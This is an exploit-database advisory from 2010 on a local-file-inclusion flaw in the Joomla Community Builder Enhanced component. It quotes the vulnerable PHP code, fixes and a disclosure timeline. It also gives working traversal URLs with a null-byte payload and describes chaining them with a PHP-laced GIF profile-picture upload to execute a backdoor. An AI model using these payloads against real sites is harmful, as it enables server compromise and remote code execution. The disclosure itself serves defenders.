[webapps / 0day] - Joomla Community Builder Enhenced Compone
Posted on 09 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Joomla Community Builder Enhenced Component LFI/RCE Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Joomla Community Builder Enhenced Component LFI/RCE Vulnerability by Delf Tonder in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>======================================================================= Joomla Community Builder Enhenced (CBE) Component LFI/RCE Vulnerability ======================================================================= Description: Joomla CBE suffers from a local file inclusion vulnerability. As CBE also offers file uploading functionality that allows to upload files that contain php-code, this can be used to execute arbitary system-commands on the host with the webservers privileges. Risk: High Affected versions: - CBE v1.4.10 - CBE v1.4.9 - CBE v1.4.8 (maybe older versions) Not affaceted: - CBE v1.4.11 (current) Vulnerable code: in cbe.php a file identified by the param "tabname" is included if the "ajaxdirekt" param is set, without sanatizing the value of "tabname" first: -- $ajaxdirekt = JRequest::getVar('ajaxdirekt', null); $tabname = JRequest::getVar('tabname', null); if ($ajaxdirekt) { $tabfile = JPATH_SITE.DS.'components'.DS.'com_cbe'.DS.'enhanced'.DS.$tabname.DS.$tabname.".php"; if (file_exists($tabfile)) { include_once($tabfile); } return; } -- Exploitation / poc: index.php?option=com_cbe&task=userProfile&user=23&ajaxdirekt=true&tabname=../../../CREDITS.php%00 will execute the CREDITS.php Addional attack-vectors: CBE offers a file-upload function for uploading user profile images. The uploaded file is not checked for beeing well-formed, it only needs to have the right mime-type and maybe (depends on profile-picture configuration) the right size, so we can embed php-code in the profile-picture. Lets say we have registered an account on the site with the user-id 23, then we can execute the backdoor by requesting: index.php?option=com_cbe&task=userProfile&user=23&ajaxdirekt=true&tabname=../../../images/cbe/23.gif%00 As we stay in the documents-root, we dont even have to worry about safe-mode directory restrictions, and using GIFs will bypass most of CBE's image pre-processing functions during file upload (except file- and image-size checks). Solutions: a) check if the contents of an uploaded file contains a php open-tag ('<?php') (requires that the php-short-open-tag option is disabled) b) Joomla offers several functions for accessing POST and GET params, i guess using getWord() instead of getVar() would be a better choice in this case. History: 04.10.2010 - vendor informed 07.10.2010 - vendor released fixed version 08.10.2010 - public disclosure Cheers Delf Tonder # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-09]</pre></body></html>
